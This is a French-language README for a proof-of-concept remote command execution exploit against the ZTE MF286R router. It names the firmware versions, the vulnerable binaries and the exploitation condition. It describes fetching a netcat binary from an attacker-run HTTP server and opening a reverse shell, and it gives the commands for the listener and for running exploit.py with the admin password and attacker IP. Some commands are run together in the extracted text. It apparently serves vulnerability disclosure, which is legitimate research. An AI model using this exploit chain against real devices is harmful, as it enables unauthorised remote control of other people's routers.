
Preuve de concept de la vulnérabilité d'injection de commandes affectant le routeur ZTE MF286R, incluant un exploit RCE.
Détails du firmware :
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10
pip install requests)La vulnérabilité est une injection de commande partagée entre le binaire zte_net_link_detect et le gestionnaire WATCH_DOG_SWITCH dans le binaire du serveur web goahead.
Notez que la vulnérabilité ne peut être exploitée que lorsque le routeur est connecté au WAN ou à Internet via une carte SIM. (La valeur de la clé "ppp_status" doit être "ppp_connected" ou "ipv4_ipv6_connected" ou "ipv6_connected").
L'idée de l'exploit est de télécharger le binaire statique netcat depuis un serveur HTTP, puis d'ouvrir un reverse shell avec lui. P.S. : Le netcat inclus dans ce dossier est big endian.
python3 -m http.server 80809999 avec nc -lvp 9999python3 exploit.py http://<routeur> <mot_de_passe_admin> <ip_attaquant, ex: 192.168.1.101>Cette vulnérabilité a été rapportée par Andrea Maugeri en septembre 2022. https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664